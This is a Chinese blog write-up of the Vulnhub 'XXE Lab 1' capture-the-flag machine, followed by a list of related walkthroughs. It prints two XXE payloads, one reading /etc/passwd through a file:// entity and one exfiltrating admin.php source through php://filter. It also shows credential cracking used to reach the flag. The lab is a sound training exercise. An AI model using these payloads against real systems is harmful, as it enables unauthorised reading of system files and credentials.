Vulnhub-xxe靶机通关,获取最终flag

最新推荐文章于 2024-04-10 20:17:42 发布
最新推荐文章于 2024-04-10 20:17:42 发布
阅读量1.4k 收藏 5
点赞数 3
分类专栏: 信息安全 文章标签: 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45491298/article/details/105041479
版权

靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/

1、 信息收集,nmap探测靶机地址

在这里插入图片描述
得到目标地址192.168.248.168,只开放80端口
在这里插入图片描述

2、 使用御剑对目标网站后台扫描

在这里插入图片描述

3、 发现存在信息页面

在这里插入图片描述

4、 访问/xxe路径

在这里插入图片描述

5、 传参抓包,得知通过xml传参

在这里插入图片描述

6、 构造恶意xml,替换参数
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>1</password></root>

在这里插入图片描述

7、 成功读取到/etc/passwd中内容

在这里插入图片描述
证明存在XXE漏洞

8、 通过php伪协议base64加密读admin.php源码
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>1</password></root>

在这里插入图片描述

9、 将返回值base64解码

得到用户名和密码md5值
在这里插入图片描述
解密密码
在这里插入图片描述
得到admin.php页面用户名/密码:administhebest/admin@123

10、得到flag提示

在这里插入图片描述

11、访问得到flag提示

在这里插入图片描述
Baes32解码然后base64解码,得到路径
在这里插入图片描述

12、使用php伪协议再次读文件

在这里插入图片描述
解码:
在这里插入图片描述

13、创建php文件,将解码后的内容插入<?php ?>中

使用xampp环境访问文件,得到报错结果没有flag
使用phpstudy访问文件,得到最终flag。

在这里插入图片描述

小刘。忙了
关注
专栏目录
XXE靶机夺取Flag复现
a1245678899的博客
10-15 655
1.首先用netdiscover对kali同一网段的进行探测。15.将其编入文档进行后进行访问得到flag.5.对这两个目录进行访问发现了两个登录页面。6.使用burpsuit对其进行抓包处理。14.对其进行base64解码发现。12.对其进行解码发现新的路径。13.进行重发以后的到新的代码。4.发现了两个禁止访问的目录。
Test靶机获取flag
最新发布
qq_54453558的博客
06-24 372
Lazysysadmin靶机复盘
DC-2靶机实操获flag
weixin_47041685的博客
02-05 1875
一:本次的靶机渗透是一个找寻DC-2靶机中的flag的过程,以最终的flag为目标。 二:使用工具:kali,DC-2靶机 三:涉及到的内容:nmap,netdiscover的用;编辑/etc/hosts文件,添加靶机IP地址及对应域名;nikto工具扫描网站结构,找到wp-login.php登录页面;wpscan工具扫描网站,获取可以登录网站的用户名;cewl生成密码字典;wpscan工具爆破可以登录用户的密码;hydra工具使用已生成的密码字典对已知的用户名进行ssh登录密码爆破,获得ssh登录用户;用
AWD靶机实战第二天:使用python脚本获取flag
2203_75839317的博客
04-10 1752
ls /flag.txt,就可以拿到flag的值。4,自动提交flag:现在我们就要考虑如何进行自动提交flag,我们来到提交页面发现有提示,有请求头。
从一道题目学习XXE漏洞
蚁景网安学院
03-01 551
本文涉及知识点实操练习:XXE漏洞分析与实践 (通过该实验了解XXE漏洞的基础知识及演示实践。) 0x01.xxe漏洞 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 0x02.xml定
渗透:vulnhub-XXE 靶机
m0_46412682的博客
09-13 1236
渗透:vulnhub-XXE 靶机 一、靶机下载 靶机XXE 下载地址: https://download.vulnhub.com/xxe/XXE.zip 二、装靶机 ①把下载好的压缩包解压到我自己的D盘:F:\虚拟机数据\XXE ②右键双击xxe.ovf-->打开方式-->VMware,存储在自己喜欢的位置 导入后,打开虚拟机 就这样,然后设置nat模式 我们这里的VM...
vulnhub-XXE Lab: 1靶机实验
桜的博客
03-29 379
vulnhub-XXE Lab: 1靶机实验 靶机: 下载链接:https://download.vulnhub.com/xxe/XXE.zip 虚拟机设置为net模式 使用nmap探测下目标ip:192.168.124.136 网页是apache默认页面 使用kali枚举一下目录,扫出来一个robots.txt文件 访问http://192.168.124.136/robots.txt ...
Vulnhub-XXE靶场
hackerXxxt的博客
08-18 418
4.从抓取中的数据包可以看出admin.php是在xxe的目录下面,所以我们打开192.168.200.131/xxe/admin.php页面,将刚刚获取到的账号密码输入。2. 打开burp suite,抓取登录页面的数据包,可以看到XML的格式,这里就可以看出我们所要攻击的XXE漏洞了。(在线php的网站各有差异,我刚开始找的都没有显示出来,还以为是我的数据弄错了,后面试了很多个才找到可以运行出的)将读取到的数据发送到Decoder下,使用base64解密,可以得到账号和密码,密码用md5解密可以得到。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhubXXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
[渗透测试学习靶机06] vulnhub 靶场 XXE Lab 1
weixin_47112073的博客
10-23 809
网上看到了好多xxe靶机通关的文章,但是没人写为什么可以实现文件读取,为什么是XXE漏洞,我在这里简单写一下,一来方便自己以后看,二来对还没有接触过xxe漏洞的朋友来说也比较友好
关于vulnhub靶场获取flag基本流程和方法
qq_54030686的博客
11-14 2617
关于vulnhub靶场获取flag基本流程和方法 将目标虚拟机和kali(个人主机)使用桥接或者nat模式连接到同一个C段下 1.发现 使用nmap,netdiscover进行主机发现,找到你的目标主机(192.168.0.1/24,192.168…0.1-255) nmap 参数 -sn 不扫描端口,只ping主机 -PE 通过ICMP echo判定主机是否存活 2.端口探测 使用nmap 进行扫描 使用-p 65535 进行全端口扫描 –A综合扫描 -O 系统扫描 端口容易出现的问题 21
vulnhubXXE靶机详解
天天学安全专属博客
03-20 921
vulnhubXXE靶机详解
xxe靶机漏洞复现
千寻的博客
05-25 1291
0x00 XML介绍 可扩展标记语言,标准通用标记语言的子集,简称XML。 是一种用于标记电子文件使其具有结构性的标记语言。 在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。 它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 它非常适合万维网传输,提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。 是Internet环境中跨平台的、依赖于内容的技术,也是当今处理分布式结构信息的有效工具。 早在1998年
Fawkes 靶机之 缓冲溢出、漏洞利用代码编写等利用
qq_40898302的博客
04-28 617
主机发现 端口扫描 WEB信息收集 FTP服务攻击 缓冲溢出 模糊测试 漏洞利用代码编写 流量转包分析 堆溢出漏洞攻击 Metasploit(MSF) 手动修复EXP代码 本地提权
xss-lab通关之路
黑白的博客
10-12 5835
xss-lab通关之路
Vulnhub靶机渗透之权限提取,SMB泄露问题-靶场Breakout--学习笔记
ZhangAweio的博客
04-09 798
Vulnhub的这个靶场非常适合新手的朋友,里面包含了 信息收集,密码解密,SMB共享文件泄露备份文件泄露,通过泄露的密码进行Linux提权。
XXE靶机渗透
zzgslh的博客
04-12 907
靶机描述 XXE靶机,目标获取flag。 (下载链接:https://download.vulnhub.com/xxe/XXE.zip)。 渗透测试过程 端口扫描 使用nmap扫描发现开放80,5355端口。 访问web服务 1.首先访问80端口,页面是Ubuntu的默认页面。 2.使用御剑扫描web目录,发现存在robots.txt目录。 3.访问robots.txt目录...
2023年广东省中职网络安全Web渗透测试解析(超详细)
Aluxian_的博客
05-19 1458
用户user01的密码为1-1000以内的数,获取用户user01的密码,将密码作为Flag进行提交,Flag格式为flag{xxx};1.访问地址http://靶机IP/task1,分析页面内容,获取flag值,Flag格式为flag{xxx};4.访问地址http://靶机IP/task4,分析页面内容,获取flag值,Flag格式为flag{xxx};5.访问地址http://靶机IP/task5,分析页面内容,获取flag值,Flag格式为flag{xxx}。√服务器场景操作系统:未知(封闭靶机
XXE的搭建和通关
h0ld1rs的博客
09-04 1488
文章目录搭建通关 php_xxeXML声明XML DTD防御办法 搭建 经过半天的搜寻后,发现,使用docker搭建的情况不是很如愿,于是找到了xxe-labs的包,再本地使用phpstudy进行搭建 通关 php_xxe 题目的样子是这样的,这是我们抓包后的结果 通过审计可以知道是post传入,根据xml的性质,我们直接构造XML声明和DTD部分,引用外部实体去尝试读取c:/windows/win.ini文件 再post参数中修改username,使他指向外部实体,从而利用该漏洞 以下为一些xml的固
复现DC-1靶机:Drupal CMS漏洞挖掘与利用
"复现DC-1靶机的攻防演练过程,涉及网络扫描、漏洞检测、Drupal CMS的利用以及数据库操作。" 在网络安全领域,靶机是一种模拟真实系统环境的工具,用于安全研究人员和渗透测试人员进行实战演练和技能提升。本资源是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值